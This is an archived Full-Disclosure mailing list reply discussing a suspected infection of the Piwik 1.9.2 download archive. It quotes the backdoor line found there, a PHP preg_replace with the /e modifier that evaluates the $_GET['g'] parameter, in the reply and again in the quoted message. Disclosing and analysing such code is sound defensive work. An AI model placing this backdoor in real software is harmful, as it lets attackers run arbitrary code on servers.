[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive

To: Maximilian Grobecker <max@xxxxxxxxxxxxxxxxx>
Subject: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
From: Christian Sciberras <uuf6429@xxxxxxxxx>
Date: Tue, 27 Nov 2012 12:54:57 +0100

> At the moment I'm trying to figure out the further sense of this code,
> but it seems that there might also be some kind of backdoor (because of
> the use of $_GET).


preg_replace("/(.+)/e", $_GET['g'], 'dwm');

You think?


Chris.


On Mon, Nov 26, 2012 at 9:17 PM, Maximilian Grobecker <max@xxxxxxxxxxxxxxxxx
> wrote:

> preg_replace("/(.+)/e", $_GET['g'], 'dwm');

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
  - From: Felipe Montecino
- Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
  - From: Max Grobecker

References:
- [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
  - From: Maximilian Grobecker

Prev by Date: [Full-disclosure] [SE-2011-01] Additional materials released for SAT TV research
Next by Date: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Previous by thread: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Next by thread: Re: [Full-disclosure] Possible infection of Piwik 1.9.2 download archive
Index(es):
- Date
- Thread